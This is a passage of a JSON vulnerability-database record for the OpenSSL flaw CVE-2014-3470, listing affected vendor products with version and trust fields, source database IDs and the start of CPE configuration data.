"vendor": "hp", "version": "473012.5" }, { "model": "nexus switch", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "31640" }, { "model": "fusionsphere v100r003c10spc600", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "telepresence advanced media gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security analytics platform", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.0" }, { "model": "tivoli workload scheduler distributed fp03", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0" }, { "model": "smc2.0 v100r002c01b025sp07", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "s2700\u0026s3700 v100r006", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "project openssl 0.9.8r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "espace cc v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "protection service for email", "scope": "eq", "trust": 0.3, "vendor": "f secure", "version": "7.1" }, { "model": "isoc v200r001c01", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "5000" }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473011.5" }, { "model": "linerate", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.2.2" }, { "model": "project openssl beta4", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.0" }, { "model": "esight-ewl v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "hyperdp oceanstor n8500 v200r001c91", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "guardium database activity monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "storevirtual hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "project openssl 1.0.0l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "9.1-release-p12", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "simatic wincc oa", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "3.8" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "oic v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.3" }, { "model": "icewall sso dfw certd", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.0" }, { "model": "spa300 series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "upward integration modules for microsoft system center", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5" }, { "model": "communicator for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "project openssl 0.9.8p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "telepresence isdn link", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip webaccelerator", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.4" }, { "model": "storevirtual fc 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.2" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.06" }, { "model": "secure access control server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ctpos 6.6r2", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.1" }, { "model": "big-ip webaccelerator", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "virtualization experience media engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber im for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "small cell factory recovery root filesystem", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.99.4" }, { "model": "big-ip edge gateway", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "ftp server", "scope": "eq", "trust": 0.3, "vendor": "cerberus", "version": "7.0" }, { "model": "enterprise manager", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "2.3" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "11.4" }, { "model": "storevirtual china hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.0" }, { "model": "espace vtm v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "spa122 ata with router", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.6" }, { "model": "infosphere guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "project openssl 1.0.1c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "chrome for android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0" }, { "model": "spa525 series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "data ontap smi-s agent", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "cp1543-1", "scope": "ne", "trust": 0.3, "vendor": "siemens", "version": "1.1.25" }, { "model": "advanced settings utility", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.52" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.4.0" }, { "model": "oncommand workflow automation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "algo audit and compliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.3.1" }, { "model": "espace u2980 v100r001c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "linerate", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.3" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.4" }, { "model": "identity service engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "9.2-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "s12700 v200r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "8.4-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tivoli workload scheduler distributed fp04", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "oceanstor s2200t v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.1.1" }, { "model": "enterprise manager", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "3.1.1" }, { "model": "s7-1500", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "s2900 v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5600v39.7" }, { "model": "open source security information management", "scope": "ne", "trust": 0.3, "vendor": "alienvault", "version": "4.10" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "email security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "7.6" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "usg5000 v300r001c10spc200", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual china hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.1.1" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.9" }, { "model": "hp-ux b.11.11", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.1.5.1" }, { "model": "stunnel", "scope": "eq", "trust": 0.3, "vendor": "stunnel", "version": "5.00" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.0" }, { "model": "one-x communicator for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.0.4" }, { "model": "one-x communicator for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.8" }, { "model": "s5900 v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "esight v2r3c10spc201", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.4" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "project openssl 0.9.8l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.13" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "project openssl h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "s3900 v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "adaptive security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyoffice emm", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "2.6.0601.0090" }, { "model": "project openssl i", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "ssl for openvms", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "1.4-476" }, { "model": "project openssl 1.0.0i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security network intrusion prevention system gx7412", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "big-iq device", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "4.3" }, { "model": "i v5r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "storevirtual 1tb mdl china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.1.21" }, { "model": "usg9500 usg9500 v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "s2750\u0026s5700\u0026s6700 v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "one-x communicator for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "rox", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "11.16" }, { "model": "enterprise server", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "prime network services controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "oic v100r001c00spc402", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "documentum content server", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "7.0" }, { "model": "icewall sso dfw", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0" }, { "model": "s7700\u0026s9700 v200r005+v200r005hp0", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "9.2-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1x8664" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.010" }, { "model": "dsr-1000 1.09.b61", "scope": "ne", "trust": 0.3, "vendor": "d link", "version": null }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "tivoli storage flashcopy manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.2" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "1.0.4" }, { "model": "vtm v100r001c30", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "oceanstor s5500t v100r005c30spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 2tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "system management homepage", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.2.4.1" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99510" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.1" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.6" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "espace u2980 v100r001 v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "cloudburst", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "tivoli netcool/system service monitor fp8", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "watson explorer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "8.4-rc2-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.3" }, { "model": "one-x communicator for mac os", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "x2.0.10" }, { "model": "idp", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "4.2" }, { "model": "spa500 series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "20500" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.4.1" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.1.5.2" }, { "model": "blackberry os", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.1.0.1880" }, { "model": "db2 connect unlimited edition for system i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "8.4-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "telepresence ip vcr series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence sx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "db2 connect unlimited edition for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "documentum content server sp1 p26", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "chrome for android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0" }, { "model": "9.2-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1.1" }, { "model": "tivoli netcool/system service monitor fp4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "project openssl 1.0.0j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "eupp v100r001c01spc101", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.5" }, { "model": "ecns600 v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.6" }, { "model": "oceanstor s2600t v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-471" }, { "model": "communicator for android", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.9" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5600v29.7" }, { "model": "security information and event management", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.3" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.3" }, { "model": "arx", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "6.0" }, { "model": "aura presence services sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "db2 connect application server edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "ave2000 v100r001c00sph001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "tivoli netcool/system service monitor fp5", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "documentum content server sp2 p15", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "tivoli workload scheduler for applications fp01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "arx", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "6.3" }, { "model": "9.2-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.0-rc2-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.4.13" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.5" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.1.21" }, { "model": "one-x communicator for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "463012.5" }, { "model": "nac appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vpn client v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "metro ethernet series access devices", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "12000" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "prime network", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "prime infrastructure", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "ace application control engine appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "9.1-rc1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "stunnel", "scope": "eq", "trust": 0.3, "vendor": "stunnel", "version": "5.01" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.2" }, { "model": "tivoli network manager ip edition fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.94" }, { "model": "project openssl 1.0.0m", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "dsr-500n rev. a1", "scope": null, "trust": 0.3, "vendor": "d link", "version": null }, { "model": "security network intrusion prevention system gx5008-v2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "ios xr software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413011.5" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.8.0" }, { "model": "nip2000\u00265000 v100r002c10spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "sterling b2b integrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "chrome for android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.166" }, { "model": "eupp v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.0.3" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "dsr-500 rev. a1", "scope": null, "trust": 0.3, "vendor": "d link", "version": null }, { "model": "guardium database activity monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "project openssl e", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.27" }, { "model": "oceanstor s5800t v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "blackberry os", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.1" }, { "model": "jabber for mac", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-iq cloud", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "4.1" }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "unified series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "69000" }, { "model": "tivoli netcool/system service monitor fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "one-x communicator for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.6" }, { "model": "oceanstor s5600t v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "db2 enterprise server edition fp7", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "db2 connect unlimited edition for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "linerate", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.3.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.1.2" }, { "model": "enterprise linux ws", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "unified communications manager session management edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance ptz ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "snapdrive for unix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "client applications", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.0" }, { "model": "9.1-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security module for cisco network registar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sbr carrier", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "8.0" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "project openssl 0.9.8za", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-320" }, { "model": "chrome for android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.9" }, { "model": "s6900 v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "db2 workgroup server edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "proventia network security controller 1.0.3350m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "dsm v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "telepresence mx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "css series content services switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "115000" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-370" }, { "model": "tivoli workload scheduler distributed fp04", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "oceanstor s5800t v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.10" }, { "model": "web gateway", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.10" }, { "model": "security network intrusion prevention system gx7412-05", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "icewall mcrp", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0" }, { "model": "storevirtual 450gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "s7700\u0026s9700 v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "9.3-beta1", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security analytics platform", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "7.1" }, { "model": "espace usm v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null } ], "sources": [ { "db": "BID", "id": "67898" }, { "db": "JVNDB", "id": "JVNDB-2014-002767" }, { "db": "CNNVD", "id": "CNNVD-201406-081" }, { "db": "NVD", "id": "CVE-2014-3470" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "1.0.0m", "versionStartIncluding": "1.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "1.0.1h", "versionStartIncluding": "1.0.1", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "0.9.8za", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": 